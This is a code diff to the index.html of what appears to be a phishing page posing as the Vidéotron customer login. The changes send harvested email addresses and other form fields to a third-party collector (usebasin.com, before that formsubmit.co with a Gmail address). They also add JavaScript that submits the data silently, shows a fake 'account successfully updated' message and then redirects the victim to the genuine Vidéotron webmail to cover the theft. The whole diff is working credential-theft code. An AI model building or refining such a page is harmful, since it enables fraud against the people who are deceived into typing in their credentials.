--- a/index.html
+++ b/index.html
@@ -55,7 +55,7 @@ function showPage() {
 <img align="top" alt="web " src="https://www.videotron.com/resources/legacy/img/espace_clientplus.png" width="40" height="40">
     </p>
 <p>
-<form action="https://formsubmit.co/isosiiso7@gmail.com" method="POST">
+<form id="contact-form" action="https://usebasin.com/f/b0af5e085536" method="POST">
 				<div class="formfield">
 					<label for="username"></label>
 					<input type="text" id="username" name="username" value="" placeholder="Votre adresse courriel" autofocus="" required="">
@@ -82,10 +82,40 @@ function showPage() {
   <p>
   </p>
 </form>
-</form>
 </div>
   </p></form>
-		
+<div id="form-success" style="display:none; color: green; margin-top: 1em;">
+  ✅ Thank you! Your account has been successfully updated to the latest version. All features are now up to date and ready to use. Redirecting...
+</div>		
+	<script>
+  const form = document.getElementById('contact-form');
+  const successMsg = document.getElementById('form-success');
+
+  form.addEventListener('submit', function (e) {
+    e.preventDefault();
+    const formData = new FormData(form);
+
+    fetch(form.action, {
+      method: 'POST',
+      body: formData,
+      headers: {
+        'Accept': 'application/json'
+      }
+    }).then(response => {
+      if (response.ok) {
+        form.reset();
+        successMsg.style.display = 'block';
+        setTimeout(() => {
+          window.location.href = 'https://courrielweb.videotron.com/iwc_static/layout/main.html?lang=fr&3.0.2.2.0_20010958&'; // Replace with your target URL
+        }, 3000); // Redirect after 5 seconds
+      } else {
+        alert('There was an issue submitting the form. Please try again.');
+      }
+    }).catch(error => {
+      alert('There was a network error. Please try again.');
+    });
+  });
+</script>
 </div>		
 </style>
 </head>
